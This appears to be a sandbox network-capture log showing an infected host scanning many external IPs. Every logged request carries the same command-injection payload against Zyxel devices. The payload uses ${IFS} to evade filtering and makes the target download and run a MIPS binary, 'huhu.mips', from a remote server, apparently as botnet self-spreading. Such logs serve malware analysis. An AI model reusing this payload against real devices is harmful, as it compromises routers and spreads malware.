                                                      Feb 2, 2024 06:36:10.001025915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8510192.168.2.144952451.193.18.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001091003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8511192.168.2.143667652.215.249.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001193047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8512192.168.2.1453340212.73.45.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001218081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8513192.168.2.1442056151.191.97.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001259089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8514192.168.2.1437258123.206.129.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001302004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8515192.168.2.1432932171.1.148.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001348019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8516192.168.2.143420618.87.44.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001389027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8517192.168.2.1450026149.96.220.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001439095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8518192.168.2.1455838222.66.194.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001475096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8519192.168.2.1455376114.80.155.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001511097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8520192.168.2.1451878193.249.12.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001565933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8521192.168.2.1458806160.0.196.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001595020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8522192.168.2.1449640166.16.124.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001656055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8523192.168.2.1459780112.243.133.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001669884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8524192.168.2.1452426132.239.249.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001689911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8525192.168.2.1460102198.147.33.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001749039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8526192.168.2.1449858158.65.230.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001780987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8527192.168.2.1458974148.90.235.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001805067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8528192.168.2.1444680191.104.49.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001866102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8529192.168.2.1441936166.138.233.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001918077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8530192.168.2.145323487.168.95.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001939058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8531192.168.2.1438116112.201.157.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.001991034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8532192.168.2.144622689.244.56.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002037048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8533192.168.2.1450734170.156.161.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002069950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8534192.168.2.1432842103.49.163.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002099037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8535192.168.2.144445494.103.111.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002131939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8536192.168.2.1445396191.20.86.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002198935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8537192.168.2.145093680.247.186.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002228975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8538192.168.2.1450022166.130.124.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002259970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8539192.168.2.144282254.222.183.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002300024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8540192.168.2.1458784157.209.173.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002338886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8541192.168.2.146081460.85.10.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002372026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8542192.168.2.143323865.166.33.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002407074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8543192.168.2.144660083.87.217.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002468109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8544192.168.2.145697675.92.0.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002504110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8545192.168.2.1459896191.183.216.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002537966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8546192.168.2.144814637.74.81.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002573967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8547192.168.2.1449240185.130.213.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002604961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8548192.168.2.143914042.190.45.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002650976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8549192.168.2.1432810218.229.10.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002679110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8550192.168.2.144889027.64.250.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002720118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8551192.168.2.144733069.196.108.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002749920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8552192.168.2.1458114113.198.166.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002790928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8553192.168.2.1455372172.105.62.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002830982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8554192.168.2.144991854.32.195.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002878904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8555192.168.2.144265013.8.209.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002924919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8556192.168.2.144522042.20.195.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.002974033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8557192.168.2.1456282170.221.212.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003010035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8558192.168.2.1455802115.212.93.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003031969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8559192.168.2.143672670.207.204.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003099918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8560192.168.2.1438240110.67.255.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003128052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8561192.168.2.143576481.128.116.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003160954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8562192.168.2.1436088211.171.57.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003205061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8563192.168.2.145571625.116.60.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003237963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8564192.168.2.1445460190.143.40.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003278971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8565192.168.2.145982271.173.22.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003299952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8566192.168.2.143621636.97.6.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003349066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8567192.168.2.1446894212.104.224.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003391027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8568192.168.2.145130812.121.178.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003420115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8569192.168.2.14520384.234.205.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003431082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8570192.168.2.145209053.92.8.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003474951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8571192.168.2.143621818.51.224.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003510952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8572192.168.2.1448112222.163.73.186443
                                                      TimestampBytes transferredDirectionData
